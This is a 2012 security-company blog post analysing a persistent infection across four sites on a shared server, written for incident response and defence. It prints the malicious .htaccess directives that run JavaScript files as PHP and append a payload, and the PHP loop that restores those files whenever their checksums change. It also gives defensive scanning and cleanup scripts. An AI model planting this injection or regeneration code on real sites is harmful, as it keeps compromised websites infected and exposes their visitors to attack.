
Website Malware – Reality of Cross-Site Contaminations

December 14, 2012

Sometimes you can't help but put yourself in the shoes of your clients and skeptics and wonder how many times they roll their eyes at the things you say. Cross-site contamination is one of those things. We first started writing about it in March of 2012 in a little post that got a lot of attention, "A Little Tale About Website Cross Contamination". In that case we talked about how the attack vector was a neighboring site that had since been neglected and was, in turn, housing the generator for the payload affecting the live sites. All in all, it was a sad and depressing story, and this one is unfortunately no different.

In this case, it's unique in that it falls into what we would categorize as a targeted attack. That's right, the complete opposite of what we often tell most readers they fall into: opportunistic attacks. I'll caveat that it's not known for sure yet, but after reading this, we'll let you be the judge.

/* It’s nothing personal, it’s just business */

The Scenario

As in most cases, a client came through our virtual doors a bit perplexed and flustered. They were suffering a continuous infection problem; no matter what they did, the same four sites kept being affected. The environment was riddled with other sites, further complicating the case, especially if you know how we're configured. It also so happened that every time we cleaned one site, within minutes it would come right back, almost as if it were laughing at us. Do you realize how annoying that is?

Often in a scenario like this it means there is another payload doing the generation, something we were missing. We have even seen it tied into the system's cron jobs and run at set intervals, making it an even more excruciating problem to debug without server root access. Needless to say, none of that was the problem; we had been staring at the problem the entire time.

This is what it was doing at a high level:

[Image: Sucuri - Cross-Site Contamination]

Of the various sites on the server, it picked four and turned them into a self-licking ice cream cone, for lack of a better term. What we quickly realized was that you couldn't just clean one, you had to clean all four at the same exact time; the regeneration cycle was so fast that by the time we cleared one, the others would be back within seconds.

The Details

So obviously the question was how it was doing this. We dug a little deeper into the payload to better understand it, and this is what we found.

The crux of the payload was in two parts:

  1. .htaccess
  2. A JavaScript file

The .htaccess was used to load the payload, but the real workhorse was the JavaScript file it was loading.

This is what the .htaccess contained:

<files ~ "\.js$">
SetHandler application/x-httpd-php
php_value auto_append_file /path-to-file/js/jquery-mini.js
php_flag display_errors Off
</files>

If you're not familiar with the directives being used, don't worry, it's pretty straightforward.

The <files ~ "\.js$"> block defines which files the directives apply to – in this case anything ending in .js. SetHandler application/x-httpd-php then tells the server to handle those JS files as PHP. php_value auto_append_file /path-to-file/js/jquery-mini.js appends the payload, which lives in that JavaScript file, to every one of them. And, just in case the server configuration would otherwise spit out warnings, php_flag display_errors Off turns error display off so that no one notices.
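Purely as an illustration – none of this comes from the original cleanup, and the docroot path is a placeholder you'd adjust – this is the kind of quick PHP sweep you could run on a shared environment to flag any .htaccess abusing those two directives:

<?php
// Hypothetical helper: walk a docroot and flag any .htaccess that maps
// another file type onto the PHP handler or appends a file to every
// request -- the two directives abused above.
$docroot = '/path-to-docroot';   // placeholder, point this at your own account
$needles = array('application/x-httpd-php', 'auto_append_file');

$iterator = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($docroot, FilesystemIterator::SKIP_DOTS)
);
foreach ($iterator as $file) {
    if ($file->getFilename() !== '.htaccess') continue;
    $contents = @file_get_contents($file->getPathname());
    if ($contents === false) continue;
    foreach ($needles as $needle) {
        if (stripos($contents, $needle) !== false) {
            echo "Suspicious directive '$needle' in " . $file->getPathname() . "\n";
        }
    }
}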

This isn't even the fun part yet; the real fun begins in the JavaScript file. This is what it looked like:

[Image: Sucuri - Cross-Site Contamination - JavaScript]

The first red flag was the use of the opening PHP tag – <?php. It's a warning sign because that doesn't belong in a JS file, but if you recall the .htaccess file, it makes sense: the file needs the tags because it's being executed as PHP. Using our free decoder you're able to quickly break down the payload to see what's going on:

[Image: Sucuri - Cross-Site Contamination - JS]

I truncated it to handle two sites or I’d never get the image into the frame. A couple of areas to pay attention to are the first two arrays:

array(
    'name'=>'/path-site-1/.htaccess',
    'checksum'=>'4235295951',
    'data'=>'7068705f76616c756…..',
    'jser'=>'/path-site-1/js/jquery-mini.js'
),
array(
    'name'=>'/path-site-2/.htaccess',
    'checksum'=>'3083167236',
    'data'=>'3c66696c6573207e20….',
    'jser'=>'/path-site-2/js/jquery-mini.js'
),

The arrays by themselves aren't doing anything, at least not until you get here:

foreach ($check as $row) {
    chmod($row['jser'], 0775);
    chmod($row['name'], 0660);
    if (crc32(@file_get_contents($row['name'])) <> $row['checksum'])
        echo @file_put_contents($row['name'], hex2bin($row['data']));
    if (crc32(@file_get_contents($___jser['selfname'])) <> crc32(@file_get_contents($row['jser'])))
        @file_put_contents($row['jser'], @file_get_contents($___jser['selfname']));
}

This is where it does the check. It asks: does the .htaccess exist, and does it still contain what it should? It does so by reading the file named in the 'name' option and verifying its hash against the 'checksum' option. If the hash matches, the file is left alone; if it doesn't, the content in the 'data' option is written in place of whatever currently exists. Comparing hashes is a very quick and effective way to check whether anything has changed – just a little tip.
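For what it's worth, that same trick works just as well defensively. Below is a minimal sketch of the idea – the watched paths and baseline file are hypothetical, and crc32 is fast rather than tamper-proof (md5 or sha1 would be stronger choices) – recording a checksum baseline and complaining when a file no longer matches it:

<?php
// Minimal file-change monitor using the same hash-comparison idea.
$watched = array(                 // placeholders, list your own critical files
    '/path-site-1/.htaccess',
    '/path-site-1/js/jquery-mini.js',
);
$baselineFile = __DIR__ . '/baseline.json';

$baseline = is_file($baselineFile)
    ? json_decode(file_get_contents($baselineFile), true)
    : array();
if (!is_array($baseline)) $baseline = array();

foreach ($watched as $path) {
    $current = crc32((string) @file_get_contents($path));
    if (!isset($baseline[$path])) {
        $baseline[$path] = $current;   // first run: record the baseline
    } elseif ($baseline[$path] !== $current) {
        echo "CHANGED: $path\n";       // contents no longer match the baseline
    }
}
file_put_contents($baselineFile, json_encode($baseline));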

It then does the same thing for the 'jser' entry. It's just one giant self-licking ice cream cone. What was really interesting is that the paths were actually hard-coded in the files:

'name'=>'/path-site-1/.htaccess',
'jser'=>'/path-site-1/js/jquery-mini.js'

I obviously replaced the path directories, but this leads us to believe this was that much-coveted thing, a targeted attack. Not because we wish them on anyone, but because they are always fun to analyze.

Now, imagine that same process across all four sites. They each contained the same payload, and the only way to remove it was to delete them all at the same time; deleting one would only regenerate the next pair.

The Payload

Let's not forget: after all that, the real intent was to drop a payload in the visitor's browser, the targets being four distinct websites. At the very bottom of the JavaScript file you find that real intent:

if (!function_exists('hex2bin')) {
    function hex2bin($h)
    {
        if (!is_string($h)) return null;
        $r = '';
        for ($a = 0; $a < strlen($h); $a += 2) $r .= chr(hexdec($h{$a} . $h{($a + 1)}));
        return $r;
    }
}

It's looking for the hex2bin function, which is used here:

[Image: Sucuri - Cross-Site Contamination - hex2bin Function]
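As a side note, decoding just the visible prefixes of those 'data' strings (the full values are truncated in the screenshots) confirms they are nothing more than hex-encoded copies of the files being restored. hex2bin() is built into PHP 5.4 and later, which is why the payload carries its own fallback for older servers:

<?php
// Decoding the visible prefixes of the 'data' values shown earlier.
var_dump(hex2bin('3c66696c6573207e20'));  // string(9) "<files ~ " -- start of the injected .htaccess block
var_dump(hex2bin('7068705f76616c75'));    // string(8) "php_valu" -- evidently the start of a php_value directive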

When you go to decode that obfuscated payload, this is what you get after the first level of obfuscation; for this one you'll need to do a little legwork:

[Image: Sucuri - Cross-Site Contamination]

And after one more layer of decoding you finally get to the intended payload:

[Image: Sucuri - Cross-Site Contamination]

To help decipher it, this is what really matters from that image:

[Image: Sucuri - Cross-Site Contamination]

If you're curious what that is doing, you might be interested in my last post about SEP Attacks and Link Farms. It's the same exact thing.

Full Circle

In the past we focused on the impacts of cross-site contamination as they pertain to attack vectors, but what we hadn’t discussed was how more sophisticated attacks can be wired together in a scenario like the one described here.

It was actually ingenious and very simple to implement. The challenge, however, was that while simple to implement, it was difficult to detect. There were no other components that would have flagged it, and for the average user this would have been an exhausting process. The fastest way to find the different payloads was to reverse engineer them until you got to the first layer, which very clearly outlined the paths and files. You'd then have to remove each one at the same time, best done from the command line via a tool like NCFTP or a shell.
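To make that last point concrete, here is a rough sketch in PHP – the paths are the same placeholders used throughout, and you'd substitute the real ones recovered from the decoded arrays – that removes every component in one quick pass so no surviving copy gets a chance to regenerate the others:

<?php
// Remove every hard-coded payload file in a single pass. In this case the
// .htaccess files contained only the injected block, so deleting them
// outright was acceptable; adjust to your own situation.
$infected = array(
    '/path-site-1/.htaccess',
    '/path-site-1/js/jquery-mini.js',
    '/path-site-2/.htaccess',
    '/path-site-2/js/jquery-mini.js',
    // ...and so on for all four sites
);

foreach ($infected as $path) {
    if (is_file($path) && !@unlink($path)) {
        echo "FAILED to remove $path - check ownership and permissions\n";
    }
}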
